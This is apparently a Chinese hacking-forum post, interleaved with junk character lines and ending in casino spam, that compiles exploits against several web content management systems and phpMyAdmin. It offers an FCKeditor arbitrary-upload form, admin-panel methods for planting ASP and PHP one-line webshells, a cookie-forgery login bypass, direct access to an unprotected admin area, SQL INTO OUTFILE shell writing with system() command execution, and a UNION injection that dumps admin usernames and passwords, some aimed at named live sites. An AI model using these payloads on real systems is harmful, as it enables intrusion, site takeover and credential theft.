# o4 L: ^- l6 I E3 O
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& \3 L( a% F$ T: D- B( ?
3 J* i* `2 Q, M
YxShop易想购物商城4.7.1版本任意文件上传漏洞
; |6 `! L: B7 G- E" v4 E" c( Z& ~
: u5 i5 @' V2 ^5 n* o( J
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
+ j8 Y4 w7 N, l+ I% D- C% d
跳转到网站根目录上传任意文件。
; o) @7 u2 l9 }/ ?
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
4 t$ @- E# } M# n* U5 |
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
2 P* ]6 U& t2 x" y* _
Upload a new file:<br>
: v' `, B% H/ A+ O
<input type="file" name="NewFile" size="50"><br>
8 I+ {* ?6 y8 D
<input id="btnUpload" type="submit" value="Upload">
' J4 d Z" A1 e# L, \: E2 D
</form>
6 _- ]5 Z7 f% y2 `
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- G/ w1 j6 k" i, D/ p# t5 w, b
7 w$ [4 r7 Y. X$ c
SDcms 后台拿webshell
/ `# V( q( y. t! K" k) q. b
5 a; S! L) Y" H* Z: ?9 N
第一种方法:
# m6 a& z* C- B$ g
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
5 v9 f. t& K1 |$ K( i& \
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
0 x; O3 T( ^/ Z/ N$ ]- l$ l% o
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
, z* w! s! |/ D2 n1 i
第二种方法:
( K$ ?/ e/ P4 p! X. e2 K7 u
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
1 ]/ @2 ^6 l* U: ^% h. ~
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
3 b: w( o# F5 u' c# [
第三种方法:
/ t7 ^ t8 t- Q
进入后台-->界面管理-->模板文件管理-->创建文件
: Z- I' A5 ~2 U- w* V, K& C
文件名写入getshell.ashx
, r: w$ Q6 W$ B5 s2 x5 G2 o
内容写入下面内容:
/ X* ^" f, \5 N/ z k
/====================复制下面的=========================/
0 a2 i0 O, N+ I8 i
<%@ WebHandler Language="C#" Class="Handler" %>
# F6 U/ i: D: c3 n% o# K& O) u
using System;
2 q. f6 Y8 q. Z- n2 T3 J" N( E; {
using System.Web;
$ ^0 R$ v ~: F' k, h- ~
using System.IO;
# b' R- \) G9 r
public class Handler : IHttpHandler {
1 I8 l5 m4 Z, U7 x
public void ProcessRequest (HttpContext context) {
9 y2 J2 D$ f( B+ _6 L1 `
context.Response.ContentType = "text/plain";
5 Q1 ]( K3 l }0 ^6 Z
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
2 k# H5 n9 B4 e, J: w
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
o* H/ U; I# B% v0 _
file1.Flush();
% }0 F6 X6 _$ S3 x4 V6 F
file1.Close();
/ P7 t _$ O8 {: W0 ~
}
9 d. Q& U0 z6 h u" j- M( S% G/ e( S
public bool IsReusable {
% k T; ~9 S: o# |7 K
get {
. E* W1 `* ?1 A h
return false;
0 B' O( Q3 {0 m3 Q1 f- U5 h8 U2 ?
}
5 U8 ]7 ?/ H/ s+ Y9 b6 ?5 N* k9 ^
}
* E3 _: w, H4 Q$ F! f c& N
}
; Y% D! t& Z7 D; z% w+ X% W
/=============================================/
) r/ b s. G' B+ ? A
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
$ \: [4 j0 q& O9 Y6 k$ K: T
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
, i8 o% x0 x/ S% g6 \% l6 N
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& q* J1 z& Q7 {" h
4 j- ]$ v( J/ L/ ~! h
ESCMS网站管理系统0day
2 g$ i" C1 c: B! ]" n$ X5 C- q& ~# y
" K' }1 T: C% \( Q
后台登陆验证是通过admin/check.asp实现的
- l$ N: ]7 X* |9 r( K* w9 D
% z+ Z* @! f2 l. w
首先我们打开
http://target.com/admin/es_index.html
" s2 D. S: D c, u& i: ]2 v" S0 [
然后在COOKIE结尾加上
2 C: [' u% x" g9 P3 r7 B
; ESCMS$_SP2=ES_admin=st0p;
' n ]1 @7 P! p2 p. P* F9 r
修改,然后刷新
0 x+ n4 D* ^3 g ]$ l
进后台了嘎..
% `3 H c- M5 ?5 P5 G6 |
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
0 g# H0 s- s. l# t8 ^9 F" k
0 V# K% o1 \% _" ^
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
4 a7 \# o9 N) I, J8 _3 f' c
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
) g0 P0 \, ^) x0 G! @* H2 [
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
' G5 Y% k$ U, _ b+ t
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
7 b3 l/ w6 L8 V: h0 M# \; C; c
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. J4 A W! ]# {6 j' j; C
1 [7 S3 o: t% f
宁志网站管理系统后台无验证漏洞及修复
( T* j' f# w$ c1 V- h# h; {3 T
7 A M( z3 V( g7 J% g# n( S
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
3 g7 ^/ D4 o6 N2 s" x, b, e
官方网站:
www.ningzhi.net
y2 M: T1 E4 D! r4 T
学校网站管理系统 V.2011版本
7 y$ u2 i3 z( T) a& G3 n% u
http://down.chinaz.com/soft/29943.htm
v0 ]' Q$ w3 n3 g8 ~$ W# y
其它版本(如:政府版等),自行下载.
* ]# _% j( e: q: e
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
( A) {) s- B" j- N6 \' T/ _; g) G
login.asp代码如下:
9 V4 b3 y) G, `* |" V
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
" L4 j9 a9 [# y7 C& _
manage.asp代码我就不帖出来了.反正也没验证.
7 \6 \7 e+ @ T" c( D
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
- T4 J( C/ |4 \' B5 B# ?2 V! a
漏洞利用:
! c+ N+ M" o6 F/ |- }
直接访问
http://www.0855.tv/admin/manage.asp
0 i# V# p! n# e8 h* f" S
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
3 C+ |9 Q# S8 `: Q8 t" i5 L! j
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 C2 S9 o/ d3 _) I+ x" G
( @. ]9 V/ t1 K
phpmyadmin拿shell的四种方法总结及修复
3 ]5 f! U* U' @
0 N) k, \# s& ]+ M( X
方法一:
+ s! `: ?8 m0 s/ Q) h, a9 j
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
8 ~$ b3 M5 \6 i1 X) r
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
0 N. d8 j! ` N9 Z! n
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
. w9 P& Q+ O& w6 ^. N
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
# A+ M+ p' w* d. m- }6 M; b
一句话连接密码:7on
" `0 T; q) c {! n
方法二:
3 e# h0 p& q1 v# }. Y, @# g
读取文件内容: select load_file('E:/xamp/www/s.php');
' e$ ^2 g* ?4 {7 k# P7 D' ?7 h/ b4 y
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
; m0 M) b- s- b6 N& i( d6 r
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
; B, H% x2 `9 B9 T
方法三:
: z( U4 [& L. J# x2 U& L
JhackJ版本 PHPmyadmin拿shell
0 t; J/ E2 P2 R6 w
Create TABLE study (cmd text NOT NULL);
* \' ]( t3 N( F
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
6 {0 k& e$ `1 R! `% b$ l
select cmd from study into outfile 'E:/wamp/www/7.php';
9 ~& D3 T) o* Z2 }. D9 b
Drop TABLE IF EXISTS study;
) S; |4 U# r. X; N3 `8 f# A
<?php eval($_POST[cmd])?>
. c, @) Q/ x2 x* O& L, K
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
. U" J- X( _3 t ~9 s
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
$ X0 _) l7 a* v) ^: W+ ?% p, @
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
' Y! f" a4 F2 F
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
: m. x2 i, a' D7 C. n! N
方法四:
$ D5 q0 U% c5 t9 j9 R
select load_file('E:/xamp/www/study.php');
2 h. q# [8 g" @: L6 o6 _
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
, V: r% {/ l! o X
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
0 {' O4 c# E6 s3 P, Z0 @% z
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
" E1 [2 J" J T1 }% d; @* W; u
1 @- R8 z2 ]% f/ @ N
NO.001中学网站管理系统 Build 110628 注入漏洞
0 L, V3 S) h3 M* F
3 X9 [+ z6 L2 H: d8 ]9 m4 V) Z
NO.001中学网站管理系统功能模块:
b* o* m- w( ]& @
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
2 ^0 y8 @1 {, o8 ?
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
) C$ }6 [! I% @$ n2 X% a4 ^) n* G
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
1 `7 a4 m& E2 I5 U
4.视频图片管理:一级分类,动态添加视频或者图片等信息
L5 |$ n% {* |, B8 \& p- F$ }
5.留言管理:对留言,修改,删除、回复等管理
5 W& V' K/ B+ W9 F" m
6.校友频道:包括校友资料excel导出、管理等功能
& \: V3 B' F/ f+ {; _3 F0 ?. \
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
7 V5 C! f% [. n' [
默认后台:admin/login.asp
% q+ j& Z8 x5 a; b& b
官方演示:
http://demo.001cms.net
! n0 L% G' N/ y7 c$ @
源码下载地址:
http://down.chinaz.com/soft/30187.htm
! Z6 m+ K5 Q" b! @
EXP:
, R3 s6 u, D) y( q" g y
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
2 ^: T( ~# Z( e! n* |0 c1 Q
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
* g2 c1 {( i& ^) m
getshell:后台有备份,你懂的
1 x! L$ u& k; _0 j8 @
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
( O6 s S6 r$ B1 ]7 _ D8 d3 F, k
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2